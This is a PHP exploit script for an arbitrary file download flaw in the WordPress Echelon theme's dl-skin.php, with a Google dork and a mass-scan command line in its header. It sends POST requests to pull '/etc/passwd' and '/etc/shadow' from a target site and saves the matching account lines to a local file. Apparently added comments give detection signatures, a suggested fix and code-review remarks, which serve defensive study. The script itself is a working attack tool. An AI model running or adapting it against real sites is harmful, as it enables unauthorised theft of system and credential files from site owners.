- <?php
- #===============================================================================
- # NAME: Wordpress A.F.D Theme Echelon
- # TIPE: Arbitrary File Download
- # Google DORK: inurl:/wp-content/themes/echelon
- # Vendor: www.wordpress.org
- # Tested on: Linux
- # EXECUTE: php exploit.php www.alvo.com.br
- # OUTPUT: EXPLOIT_WPAFD_Echelon.txt
- # AUTOR: Cleiton Pinheiro
- # Blog: http://blog.inurl.com.br
- # Twitter: https://twitter.com/googleinurl
- # Fanpage: https://fb.com/InurlBrasil
- # GIT: https://github.com/googleinurl
- # YOUTUBE https://www.youtube.com/channel/UCFP-WEzs5Ikdqw0HBLImGGA
- #
- #
- #------------------------------------------------------------------------------
- # Comand Exec Scanner INURLBR:
- # ./inurlbr.php --dork 'inurl:/wp-content/themes/echelon' -q 1,6 -s save.txt --comand-all "php exploit.php _TARGET_"
- #
- #------------------------------------------------------------------------------
- # Download Scanner INURLBR:
- # https://github.com/googleinurl/SCANNER-INURLBR
- #===============================================================================
# Runtime setup for a command-line run: error_reporting(1) reports E_ERROR only,
# the execution time limit is removed, and output is flushed as it is produced.
- error_reporting(1);
- set_time_limit(0);
- ini_set('display_errors', 1);
- ini_set('max_execution_time', 0);
- ini_set('allow_url_fopen', 1);
- ob_implicit_flush(true);
- ob_end_flush();
# Exits with a usage message when no first command-line argument was given.
- print empty($argv[1]) ? exit("0x[ERROR]: DEFINA URL / Execute: php exploit.php www.alvo.com.br\n") : NULL;
# Prepends "http://" unless the argument already contains the substring 'http'
# (strstr matches anywhere in the string, not only at the start).
- $argv[1] = isset($argv[1]) && strstr($argv[1], 'http') ? $argv[1] : "http://{$argv[1]}";
# Separator line used when formatting results.
- $config['line'] = "\n------------------------------------------------------------------------------------------------------------------\n";
# Base URL of the site being checked ("alvo" = target).
- $config['alvo'] = $argv[1];
# Defender note: this fixed theme path is what every request goes to, so POST
# requests to it in web-server access logs are the primary thing to search for
# when triaging a site that has this theme installed.
- $config['exploit'] = "/wp-content/themes/echelon/lib/scripts/dl-skin.php";
# Flushes PHP's output buffer and then the system write buffer so that progress
# lines reach the console immediately. Takes no arguments and returns nothing.
- function __plus() {
- ob_flush();
- flush();
- }
# Splits a query string of the form "a=b&c=d" into an associative array and
# URL-encodes each value.
# @param string $query  pairs separated by '&', name and value separated by '='
# @return array         name => urlencode(value)
# NOTE(review): explode('=') is called without a limit, so a value that itself
# contains '=' is cut at the first one, and a pair with no '=' reads an
# undefined $item[1].
- function __convertUrlQuery($query) {
- $queryParts = explode('&', $query);
- $params = array();
- foreach ($queryParts as $param) {
- $item = explode('=', $param);
- $params[$item[0]] = urlencode($item[1]);
- }
- return $params;
- }
# Sends one POST request to $config['alvo'] . $config['exploit'] and returns the
# raw response together with a short header summary.
# @param resource $curl   cURL handle; it is closed before this function returns
# @param array    $config reads 'file', 'alvo' and 'exploit'
# @return array           'corpo'  => raw response (headers + body, CURLOPT_HEADER is on),
#                         'server' => curl_getinfo() array,
#                         'info'   => status line, Server and Content-Disposition headers
# NOTE(review): the FALSE branch of the return is unreachable, because
# isset($corpo) is true even when curl_exec() fails and returns false.
#
# Defender note: the request carries a server-side path in the
# `_mysite_download_skin` POST field. Presumably the theme's dl-skin.php serves
# whatever path it is given (the handler is not visible here); limiting that
# handler to an allow-list of skin files, or removing the theme, is the fix to
# verify on an affected site.
- function __request_info($curl, $config) {
# Builds the form body; the file path comes from $config['file'].
- $postDados = __convertUrlQuery("_mysite_download_skin={$config['file']}&submit=Download");
# NOTE(review): $postDados_format is appended to without being initialised first.
- foreach ($postDados as $campo => $valor) {
- $postDados_format .= $campo . '=' . ($valor) . '&';
- }
- $postDados_format = rtrim($postDados_format, '&');
# count($postDados) is 2 here; CURLOPT_POST only needs a truthy value.
- curl_setopt($curl, CURLOPT_POST, count($postDados));
- curl_setopt($curl, CURLOPT_POSTFIELDS, $postDados_format);
- curl_setopt($curl, CURLOPT_URL, $config['alvo'] . $config['exploit']);
# Detection: the User-Agent is randomised per request but always contains the
# literal "blog.inurl.com.br/" followed by an MD5 hex string, which is a stable
# substring to match in access logs or WAF rules.
- curl_setopt($curl, CURLOPT_USERAGENT, 'Mozilla/' . rand(1, 20) . '.0(X11; Linux x8' . rand(1, 20) . '_6' . rand(1, 20) . ') blog.inurl.com.br/'. md5(rand(1, 200)) . '.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/'. rand(1, 500) . '.31');
# Detection: the Referer is set to the same URL as the request itself.
- curl_setopt($curl, CURLOPT_REFERER, $config['alvo'] .
- $config['exploit']);
# Turns off TLS hostname checking; CURLOPT_SSL_VERIFYPEER is not changed here.
- curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 0);
- curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 20);
# Response headers are included in the returned string, body returned rather than printed.
- curl_setopt($curl, CURLOPT_HEADER, 1);
- curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
- $corpo = curl_exec($curl);
- $server = curl_getinfo($curl);
- $status = NULL;
# The parentheses act as the regex delimiters; each call collects every line
# that starts with the given header name.
- preg_match_all('(HTTP.*)', $corpo, $status['http']);
- preg_match_all('(Server:.*)', $corpo, $status['server']);
- preg_match_all('(Content-Disposition:.*)', $corpo, $status['Content-Disposition']);
# Joins the first match of each header and strips CR/LF.
# NOTE(review): a header that is absent leaves its [0][0] index undefined.
- $info = str_replace("\r", '', str_replace("\n", '', "{$status['http'][0][0]}, {$status['server'][0][0]}{$status['Content-Disposition'][0][0]}"));
- curl_close($curl);
- unset($curl);
- return isset($corpo) ? array('corpo' => $corpo, 'server' => $server,'info' => $info) : FALSE;
- }
# Inspects one response for passwd-style account lines, prints a verdict and
# appends any matches to EXPLOIT_WPAFD_Echelon.txt in the working directory.
# @param array $config reads 'file', 'line' and 'alvo'
# @param array $rest   result of __request_info(); only 'corpo' is read
# NOTE(review): date("h:m:s") prints hour:month:second, because 'm' is the month
# format character; minutes would be 'i'.
#
# Triage note: the verdict rests only on the string "root" appearing anywhere in
# the response (headers included, case-insensitive), so an ordinary HTML page
# containing that word is reported as vulnerable. A hit in this tool's output
# file is not by itself evidence that a file was disclosed.
- function main($config, $rest) {
- __plus();
- print "0x " . date("h:m:s") . " [INFO][EXPLOITATION THE FILE]:{$config['file']}:\n";
# Collects lines that begin with common system account names.
- preg_match_all("(root:.*)", $rest['corpo'], $final);
- preg_match_all("(sbin:.*)", $rest['corpo'], $final__);
- preg_match_all("(ftp:.*)", $rest['corpo'], $final___);
- preg_match_all("(nobody:.*)", $rest['corpo'], $final____);
- preg_match_all("(mail:.*)", $rest['corpo'], $final_____);
- $_final = array_merge($final[0], $final__[0], $final___[0], $final____[0], $final_____[0]);
- $res = NULL;
# The check looks for "root", not for the account lines collected above.
- if (preg_match("#root#i", $rest['corpo'])) {
- $res.= "0x " . date("h:m:s") . " [INFO][IS VULN][RESUME][VALUES]:\n";
- $res.=$config['line'] . "\n";
- foreach ($_final as $value) {
- $res.="0x " . date("h:m:s") . " [VALUE]: $value\n";
- }
- $res.=$config['line'];
- __plus();
# Results are appended, so one file accumulates the output of every run.
- file_put_contents('EXPLOIT_WPAFD_Echelon.txt', "{$config['alvo']}\n{$res}\n", FILE_APPEND);
- print "{$res}[VALUES SAVED]: EXPLOIT_WPAFD_Echelon.txt\n\n";
- } else {
- print "0x " . date("h:m:s") . " [INFO][NOT VULN]\n";
- }
- }
# Script body: two requests are made in sequence, each followed by main().
# Defender note: one run therefore shows up as two POSTs to the same theme path
# from the same client, with '/etc/passwd' and then '/etc/shadow' (URL-encoded)
# in the `_mysite_download_skin` field.
- print "\r\n0x[EXPLOIT NAME]: Wordpress A.F.D Theme Echelon / INURL - BRASIL\n";
- $config['file'] = '/etc/passwd';
- $rest = __request_info($objcurl = curl_init(), $config);
- __plus();
# NOTE(review): $line is never assigned in this file; $config['line'] was
# probably intended, so this prints nothing.
- print $line;
- print "0x " . date("h:m:s") . " [INFO]: {$rest['info']}\n";
- print "0x " . date("h:m:s") . " [INFO][TARGET]: {$config['alvo']}\n";
- main($config, $rest);
- __plus();
# Second request. /etc/shadow is normally readable only by root, so a positive
# result here would also suggest the web server process has more privilege than
# it should (to be confirmed on the host).
- $config['file'] = '/etc/shadow';
- $rest = __request_info($objcurl = curl_init(), $config);
- __plus();
- main($config, $rest);
- __plus();